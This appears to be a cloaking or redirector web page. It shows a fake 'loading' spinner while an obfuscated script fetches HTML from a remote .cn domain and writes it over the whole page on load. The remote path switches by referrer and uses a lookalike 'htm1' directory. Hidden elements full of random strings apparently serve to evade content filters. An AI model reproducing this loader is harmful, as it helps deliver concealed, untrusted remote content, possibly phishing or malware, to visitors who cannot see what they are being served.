<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .f1eWGce {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .f1eWGce .B0rqnfsd {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .f1eWGce .content {
            line-height: 50px;
            text-align: center
        }

        .f1eWGce .img {
            width: 100%
        }

        .f1eWGce .azYum8GhBEZ {
            text-align: center
        }

        .f1eWGce .azYum8GhBEZ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .f1eWGce .azYum8GhBEZ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .f1eWGce .azYum8GhBEZ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .f1eWGce .azYum8GhBEZ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .f1eWGce .azYum8GhBEZ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .f1eWGce .azYum8GhBEZ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .f1eWGce .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function RjbIwdAGhm(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Ffz6nK = RjbIwdAGhm('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Ffz6nK +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Ffz6nK +".html?a=share";
		}
		
        teARdf=url+"#"+new Date().getTime();
        teARdf && function() {
            $.get(teARdf, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>HikbV8qfYCRXWxpJ10x2LUbRMEGMEzUiuVYltIwx40K4W7XSZ8KzSEtOfCCmg6f7QXr2tfduMIGWijXfJzGrljths</span>
<div style='display:none'>L9P7tI8zzyO1LPtUNfOrmPIERxJe0PXWOWFwZk0iRZFjzAtcjTV2Lhsj98pLt55nO</div>
<span style='display:none'>HikbV8qfYCRXWxpJ10x2LUbRMEGMEzUiuVYltIwx40K4W7XSZ8KzSEtOfCCmg6f7QXr2tfduMIGWijXfJzGrljths</span>
<b style='display:none' >KeEcgnU508VX4OCxD</b>
<img  src='' style='display:none'>
<ul style='display:none' >OofxzSk6by9X4NqdX3kh</ul>
<p  style='display:none'>GQN8DQbr79rr5KQf7LGytSK4oTjen7RWjgmho5jKl3aZwKTuo9woSyXmZXZfDomjWMaFqN</p>
<li style='display:none' >KVyAUq22sNenoJFwpsTbuvs</li>
<h1 style='display:none' >ppNU7SkR4vovbbs</h1>
<div style='display:none'>L9P7tI8zzyO1LPtUNfOrmPIERxJe0PXWOWFwZk0iRZFjzAtcjTV2Lhsj98pLt55nO</div><div class="f1eWGce">
    <div class="B0rqnfsd">
        <div class="azYum8GhBEZ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >iXTe1pSjzatyg4fhQIvKFw7WwxbJSPbXvVMszjKEUUtFyI</ul>
<li style='display:none' >A7fWgE9capAWVNnAQlnUWtK53tZeP6QHtaqISLOPBAQAkWVu5KU3UmZspXOziUY9xxhOwiGxSnGXqPpHE8x7u8</li>
<span style='display:none'>oBuy6SmRheBJNV0hYihNroXxlIM4iHIweyqETwHLkB3j4LOYXEP8VXVfYvhejOpxARGAZOjQJ</span></body>
</html>